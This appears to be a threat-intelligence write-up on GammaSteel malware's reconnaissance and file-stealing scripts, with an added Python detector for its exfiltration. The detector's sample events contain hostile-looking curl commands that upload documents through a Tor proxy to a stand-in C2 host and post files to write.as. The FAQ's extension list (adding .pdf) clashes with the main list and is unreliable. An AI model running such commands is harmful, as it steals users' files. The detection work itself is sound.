GammaSteel Malware: A Threat to Computer Security
Reconnaissance Script
One of the scripts served as a reconnaissance tool, collecting information about the computer, including:
- System information
- Name of security software running
- Available space on disks
- Directory tree of the Desktop folder
- List of all running processes
All this collected information was sent back to the C2 server.
New GammaSteel Variant
PowerShell Script
The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories, including:
- Desktop
- Downloads
- Documents
The targeted extensions included:
- .doc
- .docx
- .xls
- .xlsx
- .ppt
- .pptx
- .vsd
- .vsdx
- .rtf
- .odt
- .txt
Data Exfiltration Methods
The new GammaSteel version uses PowerShell web requests to exfiltrate files, and if that fails, it:
- Falls back to using the cURL command line tool with a Tor proxy to send data out
- May use the web service write.as as a fallback data exfiltration channel
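As an added example (not code from the original report or from any GammaSteel sample), here is a small Python detector that walks constructed process-creation events and flags the exfiltration fallbacks described above: curl.exe spawned by PowerShell, a curl proxy pointing at a local Tor SOCKS port, an upload argument naming one of the targeted document extensions, and write.as in the command line. The event fields, PIDs, paths and command lines are invented for the demo.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields.
# These records are invented for the demo, not telemetry from a real incident.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 812,  "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5008, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -f C:\\Users\\Public\\update.ps1"},
    {"pid": 5320, "ppid": 5008, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe --proxy socks5h://127.0.0.1:9050 -T C:\\Users\\u\\Desktop\\q1.xlsx http://c2.example/up"},
    {"pid": 5330, "ppid": 5008, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s -X POST https://write.as/api/posts -d @C:\\Users\\Public\\out.txt"},
    {"pid": 6001, "ppid": 4120, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -O https://downloads.example.com/tool.zip"},   # benign download
]

# curl proxy argument pointing at the default Tor SOCKS ports (9050 daemon, 9150 browser bundle)
TOR_PROXY = re.compile(r"(?:--proxy|-x)\s+socks[45]h?://[^\s]*:(?:9050|9150)\b", re.I)
# extensions the PowerShell stealer targets, as listed in the report
TARGET_EXT = re.compile(r"\.(?:docx?|xlsx?|pptx?|vsdx?|rtf|odt|txt)\b", re.I)
# curl switches that send a local file or body to the server
UPLOAD_FLAG = re.compile(r"\s(?:-T|-F|-d|--data\S*|--upload-file)\s")

def is_powershell(image): return image.lower().endswith("powershell.exe")
def is_curl(image): return image.lower().endswith("curl.exe")

def analyze(events):
    """Return {pid: [reasons]} for events matching the GammaSteel exfiltration pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        reasons, cmd = [], e["cmdline"]
        parent = by_pid.get(e["ppid"])
        if is_curl(e["image"]):
            if parent and is_powershell(parent["image"]):
                reasons.append("curl.exe spawned by PowerShell")
            if TOR_PROXY.search(cmd):
                reasons.append("curl routed through a local Tor SOCKS proxy")
            if TARGET_EXT.search(cmd) and UPLOAD_FLAG.search(cmd):
                reasons.append("upload of a document-type file")
        if "write.as" in cmd.lower():
            reasons.append("write.as used as a fallback channel")
        if reasons:
            findings[e["pid"]] = reasons
    return findings

if __name__ == "__main__":
    for pid, reasons in analyze(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

A single curl.exe launch is common on Windows 10+ where curl ships by default, so treat the parent-process and Tor-proxy reasons together as the high-confidence signal and the plain PowerShell-parent match alone as a hunting lead.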
Conclusion
The GammaSteel malware is a sophisticated threat that uses multiple scripts to compromise computer security. Its reconnaissance capabilities allow it to collect sensitive information, while its data exfiltration methods enable it to steal sensitive files. It is essential for computer users to be aware of these threats and take necessary precautions to protect their systems.
FAQs
- What is GammaSteel malware? GammaSteel is a type of malware that uses multiple scripts to compromise computer security.
- What does the reconnaissance script do? The reconnaissance script collects information about the computer, including system information, security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes.
- What is the purpose of the PowerShell script? The PowerShell script exfiltrates files with certain extensions from specified directories.
- What are the targeted file extensions? The targeted file extensions include .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt, and .pdf.
- How does GammaSteel exfiltrate data? GammaSteel uses PowerShell web requests and the cURL command line tool with a Tor proxy to exfiltrate data, and may use the web service write.as as a fallback data exfiltration channel.